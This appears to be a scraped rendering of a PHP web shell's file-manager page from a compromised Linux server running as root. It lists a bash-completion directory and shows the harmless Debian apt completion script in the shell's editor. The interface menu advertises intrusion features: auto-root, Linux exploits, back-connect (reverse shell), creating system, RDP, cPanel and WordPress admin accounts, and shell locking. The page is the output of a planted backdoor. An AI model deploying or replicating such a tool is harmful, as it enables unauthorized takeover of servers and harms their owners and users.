Linux r-1tbfree-gecko-e8ip2zsa-2f967-wvg4t 6.12.63-84.121.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Dec 31 02:07:30 UTC 2025 x86_64
PHP/8.5.2 (Development Server)
: | : 10.16.21.217
Cant Read [ /etc/named.conf ]
8.5.2
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
bash-completion /
completions /
[ HOME SHELL ]
Name
Size
Permission
Action
apt
7.42
KB
-rw-r--r--
blkdiscard
698
B
-rw-r--r--
blkid
2.11
KB
-rw-r--r--
blkzone
1014
B
-rw-r--r--
blockdev
789
B
-rw-r--r--
chcpu
1.49
KB
-rw-r--r--
chmem
501
B
-rw-r--r--
chrt
920
B
-rw-r--r--
debconf
293
B
-rw-r--r--
debconf-show
293
B
-rw-r--r--
dmesg
1.21
KB
-rw-r--r--
fallocate
721
B
-rw-r--r--
findfs
695
B
-rw-r--r--
findmnt
3.19
KB
-rw-r--r--
flock
886
B
-rw-r--r--
fsck
770
B
-rw-r--r--
fsfreeze
524
B
-rw-r--r--
fstrim
755
B
-rw-r--r--
getopt
815
B
-rw-r--r--
hardlink
1.49
KB
-rw-r--r--
ionice
1.13
KB
-rw-r--r--
ipcmk
882
B
-rw-r--r--
ipcrm
1.77
KB
-rw-r--r--
ipcs
514
B
-rw-r--r--
isosize
529
B
-rw-r--r--
ldattach
1.44
KB
-rw-r--r--
logger
1.64
KB
-rw-r--r--
losetup
1.7
KB
-rw-r--r--
lsblk
2.48
KB
-rw-r--r--
lscpu
1.05
KB
-rw-r--r--
lsipc
1.43
KB
-rw-r--r--
lslocks
1.08
KB
-rw-r--r--
lslogins
1.71
KB
-rw-r--r--
lsmem
1.04
KB
-rw-r--r--
lsns
1.18
KB
-rw-r--r--
mcookie
599
B
-rw-r--r--
mkfs
659
B
-rw-r--r--
mkswap
1.04
KB
-rw-r--r--
more
752
B
-rw-r--r--
mount
2.06
KB
-rw-r--r--
mountpoint
498
B
-rw-r--r--
namei
500
B
-rw-r--r--
newgrp
610
B
-rw-r--r--
nsenter
1.26
KB
-rw-r--r--
partx
1.27
KB
-rw-r--r--
pivot_root
387
B
-rw-r--r--
prlimit
1.3
KB
-rw-r--r--
readprofile
679
B
-rw-r--r--
rename.ul
683
B
-rw-r--r--
renice
784
B
-rw-r--r--
rev
439
B
-rw-r--r--
rtcwake
1.06
KB
-rw-r--r--
runuser
1009
B
-rw-r--r--
script
1.04
KB
-rw-r--r--
scriptlive
762
B
-rw-r--r--
scriptreplay
917
B
-rw-r--r--
setarch
790
B
-rw-r--r--
setpriv
3.15
KB
-rw-r--r--
setsid
440
B
-rw-r--r--
setterm
2.53
KB
-rw-r--r--
sqv.bash
2.22
KB
-rw-r--r--
su
1009
B
-rw-r--r--
swaplabel
635
B
-rw-r--r--
swapoff
743
B
-rw-r--r--
swapon
1.97
KB
-rw-r--r--
taskset
1.18
KB
-rw-r--r--
uclampset
665
B
-rw-r--r--
umount
1.82
KB
-rw-r--r--
unshare
936
B
-rw-r--r--
wall
634
B
-rw-r--r--
wdctl
1.34
KB
-rw-r--r--
whereis
531
B
-rw-r--r--
wipefs
1.3
KB
-rw-r--r--
zramctl
1.28
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : apt
# Debian apt(8) completion -*- shell-script -*- _apt() { local sourcesdir="/etc/apt/sources.list.d" local cur prev words cword _init_completion || return local GENERIC_APT_GET_OPTIONS=' -d --download-only -y --assume-yes --assume-no -u --show-upgraded -m --ignore-missing -t --target-release --download --fix-missing --ignore-hold --upgrade --only-upgrade --allow-change-held-packages --allow-remove-essential --allow-downgrades --print-uris --trivial-only --remove --arch-only --allow-unauthenticated --allow-insecure-repositories --install-recommends --install-suggests --no-install-recommends --no-install-suggests --fix-policy ' # see if the user selected a command already local COMMANDS=( "list" "search" "show" "showsrc" "install" "reinstall" "remove" "purge" "autoremove" "autopurge" "update" "upgrade" "full-upgrade" "dist-upgrade" "edit-sources" "help" "source" "build-dep" "clean" "autoclean" "download" "changelog" "moo" "modernize-sources" "depends" "rdepends" "policy") local command i for (( i=1; i < ${#words[@]}; i++ )); do if [[ " ${COMMANDS[*]} " == *" ${words[i]} "* ]]; then command=${words[i]} break fi done # Complete a -t<SPACE><TAB> case $prev in -t|--target-release) COMPREPLY=( $( compgen -W "$(apt-cache policy | grep -Eo 'a=[^,]*|n=[^,]*' | cut -f2- -d= | sort -u)" -- "$cur" ) ) return 0 ;; esac # When the cursor (cword) is before the command word (i), only suggest # options but not package or file names: if [[ $cur == -* || ( -v command && $cword -le $i ) ]]; then case ${command-} in install|reinstall|remove|purge|upgrade|dist-upgrade|full-upgrade|autoremove|autopurge) COMPREPLY=( $( compgen -W '--show-progress --fix-broken --purge --verbose-versions --no-list-columns --auto-remove -s --simulate --dry-run --download --fix-missing --fix-policy --ignore-hold --force-yes --trivial-only --reinstall --solver --no-strict-pinning -t --target-release'"$GENERIC_APT_GET_OPTIONS" -- "$cur" ) ) return 0 ;; update) COMPREPLY=( $( compgen -W '--list-cleanup --print-uris --allow-insecure-repositories ' -- "$cur" ) ) return 0 ;; list) COMPREPLY=( $( compgen -W '--installed --upgradable --manual-installed -v --verbose -a --all-versions -t --target-release ' -- "$cur" ) ) return 0 ;; show) COMPREPLY=( $( compgen -W '-a --all-versions ' -- "$cur" ) ) return 0 ;; depends|rdepends) COMPREPLY=( $( compgen -W '-i --important --installed --pre-depends --depends --recommends --suggests --replaces --breaks --conflicts --enhances --recurse --implicit' -- "$cur" ) ) return 0 ;; search) COMPREPLY=( $( compgen -W ' -n --names-only -f --full' -- "$cur" ) ) return 0 ;; showsrc) COMPREPLY=( $( compgen -W ' --only-source' -- "$cur" ) ) return 0 ;; source) COMPREPLY=( $( compgen -W ' -s --simulate --dry-run -b --compile --build -P --build-profiles --diff-only --debian-only --tar-only --dsc-only -t --target-release '"$GENERIC_APT_GET_OPTIONS" -- "$cur" ) ) return 0 ;; build-dep) COMPREPLY=( $( compgen -W ' -a --host-architecture -s --simulate --dry-run -P --build-profiles -t --target-release --purge --solver --no-strict-pinning '"$GENERIC_APT_GET_OPTIONS" -- "$cur" ) ) return 0 ;; moo) COMPREPLY=( $( compgen -W ' --color ' -- "$cur" ) ) return 0 ;; clean|autoclean) COMPREPLY=( $( compgen -W ' -s --simulate --dry-run ' -- "$cur" ) ) return 0 ;; esac return fi # specific command arguments if [[ -v command ]]; then case $command in remove|purge|autoremove|autopurge) if [[ -f /etc/debian_version ]]; then # Debian system COMPREPLY=( $( \ _xfunc dpkg _comp_dpkg_installed_packages $cur ) ) else # assume RPM based _xfunc rpm _rpm_installed_packages fi return 0 ;; show|list|download|changelog|depends|rdepends) COMPREPLY=( $( apt-cache --no-generate pkgnames "$cur" \ 2> /dev/null ) ) return 0 ;; install|reinstall) if [[ "$cur" == .* || "$cur" == /* || "$cur" == ~* ]]; then _filedir "deb" else COMPREPLY=( $( apt-cache --no-generate pkgnames "$cur" \ 2> /dev/null ) ) fi return 0 ;; source|build-dep|showsrc|policy) if [[ "$command" == build-dep && ( "$cur" == .* || "$cur" == /* || "$cur" == ~* ) ]]; then _filedir "dsc" else COMPREPLY=( $( apt-cache --no-generate pkgnames "$cur" \ 2> /dev/null ) $( apt-cache dumpavail | \ command grep "^Source: $cur" | sort -u | cut -f2 -d" " ) ) fi return 0 ;; edit-sources) COMPREPLY=( $( compgen -W '$( command ls $sourcesdir )' \ -- "$cur" ) ) return 0 ;; moo) COMPREPLY=( $( compgen -W 'moo' \ -- "$cur" ) ) return 0 ;; esac else # no command yet, show what commands we have COMPREPLY=( $( compgen -W '${COMMANDS[@]}' -- "$cur" ) ) fi return 0 } && complete -F _apt apt # ex: ts=4 sw=4 et filetype=sh
Close